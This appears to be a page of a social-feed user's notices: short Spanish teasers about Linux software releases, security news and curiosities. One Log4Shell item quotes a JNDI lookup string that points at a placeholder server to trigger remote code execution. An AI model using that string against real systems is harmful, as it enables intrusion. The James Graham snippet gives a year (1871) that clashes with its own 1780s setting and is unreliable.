Notices by asrafil@pod.geraspora.de (asrafil@pod.geraspora.de), page 4

KDE Gear 21.12 ha aparecido hace poco como el último lanzamiento del conjunto de aplicaciones que siguen el calendario del proyecto matriz (otros como Krita y la suite Calligra no lo hacen). Como es habitual en un entorno tan vivo como el de KDE, las aplicaciones suelen recibir mejoras y cambios importantes en cada iteración, así que aprovechamos la ocasión para profundizar en Kdenlive, el editor de vídeo no lineal.

Kdenlive es un editor bastante conocido que poco a poco se ha ido haciendo un hueco en la edición de vídeo no profesional e incluso en la profesional que no requiere de las avanzadas posibilidades que ofrecen soluciones como DaVinci Resolve y Adobe Premiere. Dentro de su segmento, probablemente sea la aplicación más popular entre los usuarios de Linux, aunque también cuenta con una base de usuarios de Windows. Su código base está actualmente publicado bajo la licencia GPLv3.

Kdenlive 21.12 viene con importantes novedades que a buen seguro harán que la aplicación dé un importante salto cualitativo, ya que ha incorporado un algoritmo de seguimiento basado en el aprendizaje profundo. Dicho con otras palabras, ha incluido soporte basado en inteligencia artificial, siguiendo así, al menos de manera aproximada, la estela de OpenShot.

La Cama Celestial es una idea desarrollada por James Graham en la década de 1780. Este personaje estudió electricidad en la Universidad de Edimburgo, inaugurando el Templo de la Salud en Londres. Además, en 1871 abrió el Templo del Himen. Entre muchas invenciones su propuesta más ambiciosa era la Cama Celestial. Esencialmente, una cama de grandes dimensiones rodeada de luces y espejos que curaba desde la infertilidad hasta la disfunción eréctil.

Cama Celestial(1)

Graham también vendía pastillas para prevenir o curar las enfermedades de transmisión sexual. Contaba con lociones para solucionar los gases y la depresión. Lo curaba casi todo, pero tras caer en bancarrota, buscó en los baños de tierra una nueva salida a sus problemas financieros. Finalmente, Graham murió en Edimburgo en medio de un largo ayuno.

Hace poco fue dada a conocer la liberación de la nueva versión de Tux Paint 0.9.27, versión en la cual se han realizado algunos cambios importantes.

Para quienes desconocen de Tux Paint, deben saber que el programa está diseñado para niños de 3 a 12 años y fue inicialmente creado para funcionar bajo sistema operativo GNU/Linux, debido a que no había aplicaciones similares de dibujo para niños en este entonces.

Está escrito en el lenguaje de programación C y utiliza varias bibliotecas auxiliares libres.

Ubuntu es una de las distribuciones de Linux más populares. Una vulnerabilidad afecta a este sistema operativo y pone en riesgo a los usuarios. Se trata de un fallo que permite a un atacante obtener privilegios root y tomar el control total. Esto lo consigue al explotar un error de corrupción de memoria doble libre en el componente AccountsService de GNOME.

"Tesla hará que se pueda comprar algunos productos con Doge y ver cómo va" anunió Elon Musk, uno de los hombres más ricos del mundo y líder de Tesla hace unas horas en su perfil de Twitter. Es decir, que la marca aceptará la criptomoneda Dogecoin para alguna transacción (además de coches, la marca vende ropa, hebillas de cinturón, miniaturas de sus coches, entre otros). Y el valor de esta moneda ha subido en un 24% tras este tuit.

Los deepfakes nos han dado a lo largo de este año 2021 momentos inolvidables y muy sorprendentes. Hemos visto a la gran Lola Flores, fallecida en 1995, anunciando una cerveza del sur de España en un comercial actual.

También hemos visto una simulación virtual del CEO de Nvidia presentando el concepto del omniverso de la empresa y ni siquiera nos dimos cuenta de que no era el real; y has hemos podido dar vida a personas en fotos antiguas (una tendencia que inundó las redes sociales).

Para conectarnos a Internet y navegar podemos hacerlo de forma directa o también a través de proxy. Esta última opción consiste en un software o dispositivo que actúa como intermediario. Básicamente nuestra conexión pasa primero por un punto hasta llegar al servidor de destino. Es algo común en muchos puestos de trabajo, para ocultar la ubicación real o incluso evitar el bloqueo de algunas páginas. En este artículo vamos a explicar cómo saltarte el proxy y salir directamente a Internet.

En ocasiones resulta interesante tener un control sobre los cambios de un sitio web. Puede que tengamos una página propia y queramos monitorizar que todo funciona bien o puede que simplemente estemos pendientes de algún cambio en una web que solemos visitar. En este artículo vamos a hablar de una serie de servicios online con los que podemos monitorizar páginas web. Podremos, por ejemplo, recibir alertas cuando haya una variación.

Hace pocos dias nuestro compañero Linux Post Install hablo aquí en el blog sobre Ventoy la cual es una herramienta de código abierto para crear una unidad USB de arranque para archivos ISO/WIM/IMG/VHD(x)/EFI. Con ventoy, no necesitas formatear el disco una y otra vez, sólo necesitas copiar los archivos ISO/WIM/IMG/VHD(x)/EFI a la unidad USB y arrancarlos directamente

Y ahora, en noticias más recientes nos complace anunciar que hace poco se dio a conocer el lanzamiento de la nueva versión de Ventoy 1.0.62 para crear dispositivos USB de arranque con múltiples sistemas operativos.

Que Microsoft lance productos para Linux no es ya ninguna novedad. El gigante de Redmond dio todo un giro de timón con la liberación de .NET y hasta se ha atrevido a desarrollar sus propias distribuciones. Más recientemente, la compañía ha publicado como Open Source un conjunto de herramientas para medir el rendimiento en Linux, Android y Chromium.

El conjunto de herramientas, que tiene por nombre “Microsoft-Performance-Tools for Linux-Android”, está construido con .NET Core y el nuevo SDK de rendimiento de la corporación y ha sido publicado en GitHub bajo la licencia MIT, la favorita de la corporación dirigida por Satya Nadella.

Las herramientas suministradas por Microsoft-Performance-Tools for Linux-Android son tres: LTTng, perf y Perfetto. Según el blog para desarrolladores de la compañía, todas estas están soportadas por Linux, pero solo Perfetto funciona en Android y navegadores Chromium como Edge y Chrome. El conjunto también cuenta con una interfaz gráfica de usuario usando Windows Performance Analyzer (WPA), pero esta solo funciona, como bien indica su nombre, en Windows.

HackMyVM es una plataforma que ofrece un entorno de entrenamiento y aprendizaje sobre conceptos de seguridad informática totalmente gratuito.
En ella podremos encontrar máquinas virtuales con ciertas vulnerabilidades totalmente diferentes entre ellas, en las que se pueden llegar a aprender conceptos tales como exploits, cifrados, cross-site scripting, ingeniería inversa, inyecciones SQL, inyección de código, etc...

Estamos hablando de una cantidad a día de hoy de 135 máquinas a nuestra disposición, por lo que nada tiene que envidiar a otras plataformas del sector.
Algo a destacar es que estas máquinas, las cuales van apareciendo continuamente, son creadas por los propios usuarios. Lo que hace que se forme una gran comunidad y un muy buen ambiente.

Hoy hemos amanecido con la noticia de que WhatsApp ha implementado una nueva función de privacidad por defecto, por la cual se limitará mucho quién puede ver nuestro estado "En línea". Con esta medida, además, se dice adiós a las webs y servicios que sirven exclusivamente para espiar este estado y contabilizar cuánto tiempo pasa en línea una persona y cuántas veces al día se conecta.

Esta nueva política de WhatsApp es algo a aplaudir, pues de un plumazo acaba con uno de los puntos más problemáticos de la privacidad en la plataforma de mensajería. Sin embargo, atendiendo a los detalles técnicos que han aportado, sigue sin ser suficiente cuando tenemos en cuenta la toxicidad que puede llegar a existir en la cabeza de las personas.

Desde ayer mismo hay en YouTube un vídeo mostrando la "mayor partida de ajedrez" que nunca hemos visto, según lo define su creador, Lex Fridman, un amante del ajedrez y también de la inteligencia artificial. Para hacer posible este juego infinito, Fridman ha desvelado cómo ha hecho para usar dos motores de inteligencia artificial en esta misión.

Concretamente, esta partida programó dos motores de inteligencia artificial que juegan como rivales. Y el tablero no es uno convencional, sino que es infinito. Va aumentando desde un tablero inicial con las 32 piezas de ambos jugadores. El vídeo que muestra cómo funciona es de menos de 3 minutos, pero demuestra que la jugada podría ser eterna.

Recientemente se ha publicado un exploit de día 0 en log4j, la popular librería de Java desarrollada por la Apache Foundation que da como resultado la ejecución remota de código (RCE) al loggear una determinada cadena con la sintaxis ${jndi:ldap://servidor_dns/exp}. Así de sencillo:

Log4Shell es la última vulnerabilidad que trae de cabeza a muchos administradores que han visto cómo sus servidores son vulnerables a ataques remotos. Se trata de un fallo de seguridad severo, que puede ser explotado de una manera sencilla. Además, puede afectar a una gran cantidad de usuarios. Se ha descubierto que afecta a servicios en la nube como Apple iCloud o Steam. En este artículo explicamos qué es exactamente, cómo funciona y por supuesto qué hacer para solucionar este problema.

La difusión el pasado jueves de una vulnerabilidad 'zero day' que afecta potencialmente a millones de usuarios de cientos de populares servicios online (de Minecraft a iCloud, pasando por Steam, Cloudflare, etcétera) ha obligado administradores de todo el mundo a realizar actualizaciones urgentes para cerrarles las puertas a los cibercriminales.

La vulnerabilidad, conocida como 'CVE-2021-44228' o 'Log4Shell', fue descubierta por Chen Zhaojun (ingeniero de software de Alibaba), y afecta a Apache Log4j, una biblioteca open source desarrollada por la Apache Foundation que facilita a aplicaciones del ecosistema Java mantener un registro de actividades realizadas en tiempo de ejecución.

Por ahora, la vulnerabilidad se ha usado sobre todo para difundir malware de criptominado, pero dado que permite la ejecución remota de código en varias de las aplicaciones web más populares, sus efectos si éstas no la parchean inmediatamente pueden ser mucho más graves.

De hecho, se le ha asignado un 10/10 en el CVSS (Common Vulnerability Scoring System), un estándar de medición de la gravedad de vulnerabilidades, y en estos días se ha detectado actividad sospechosa (mayoritariamente procedente de la red Tor) escaneando masivamente la presencia de esta vulnerabilidad en servidores web.

KDE Gear 21.12 es la tercera y última versión del año del conjunto de aplicaciones mantenidas por el proyecto KDE y que se pueden disfrutar tanto en el entorno de KDE Plasma, como más allá de manera totalmente independiente, no en vano incluye alguna de las alternativas más potentes de su categoría para el escritorio Linux.

Como ya os contamos, KDE Gear es el nuevo nombre de lo que hasta principios de año conocíamos como KDE Applications y hasta ahí los cambios externos, ya que a nivel interno estamos ante el mismo lanzamiento de siempre… lo cual no tiene nada de malo, sino todo lo contrario: cada versión de KDE Applications Gear trae alegría en la forma de nuevas características y funciones para las aplicaciones de KDE y, en ocasiones, hasta nuevas aplicaciones.

En lo que llevamos de 2021 se han lanzado KDE Gear 21.04 y KDE Gear 21.08 y ahora llega KDE Gear 21.12, como en las versiones previas, sin sorpresas apenas en lo que a protagonistas se refiere, pero con el suficiente jugo como para que los usuarios acérrimos del entorno reciban con ganas la actualización.

Estamos en una época de transición hacia un mundo cada vez más digital. Las soluciones tradicionales que hasta hace unos años era útiles ahora ya no lo son. El auge del teletrabajo y el trabajo en la nube han cambiado nuestra forma de trabajar. Ahora podemos acceder a los archivos desde cualquier lugar pero eso implica también unos cambios en cuanto a materia de seguridad. En ese aspecto las organizaciones deben adaptarse a la nueva realidad. Las empresas de ciberseguridad están lanzando un nuevo concepto de confianza cero, ¿es una buena solución para protegernos de los peligros del ransomware?

Se ha hecho de rogar, pero ya está aquí Zorin OS 16 Lite, la edición ligera de la más reciente versión de esta popular distribución enfocada en el común de los usuarios, con especial atención para con aquellos que vienen de nuevas, sobre todo desde Windows. O así se ha vendido siempre a sí misma Zorin OS.

En el caso de Zorin OS 16 Lite, cuya particularidad es la de utilizar el entorno de escritorio Xfce (4.16), llega prácticamente cuatro meses después de que lo hiciera su edición principal, basada en una modificación de GNOME. ¿A qué se ha debido el desfase entre el lanzamiento previo y el presente? No hay detalles al respecto.

Así pues, Zorin OS 16 Lite llega con las mismas novedades de Zorin OS 16 que ya vimos en el lanzamiento de esta, tanto de fondo como de forma, exceptuando aquellas propias de GNOME: basada en Ubuntu 20.04 LTS, incluyendo componentes como el kernel Linux 5.11 o Mesa 21; tema visual refinado, nuevos wallpapers, disposiciones de escritorio renovadas, un nuevo asistente de bienvenida…

Cuando de personalización, optimización y apps de productividad se trata, GNU/Linux suele ganarle la batalla a otros Sistemas Operativos, como Windows y MacOS. Y no solo por las nativas funcionalidades y características de cada Entorno de Escritorio (Desktop Environment) o Gestor de Ventana (Windows Manager / WM), sino por las muchas apps de terceros disponibles para ello, sin necesidad de temer por virus o inestabilidades del sistema en caso de instalarlas. Y un buen ejemplo de estas apps de las que hablamos es «Gnome-Pie».

Ya que, «Gnome-Pie» es una interesante app de productividad que ofrece un útil Menú de aplicaciones en modo de Lanzador flotante y circular, ideal para el Entorno de Escritorio de GNOME. Y que suele funcionar en otros DEs y WMs, en mayor o menor grado de efectividad.

Gnome Pie: nuevo lanzador de aplicaciones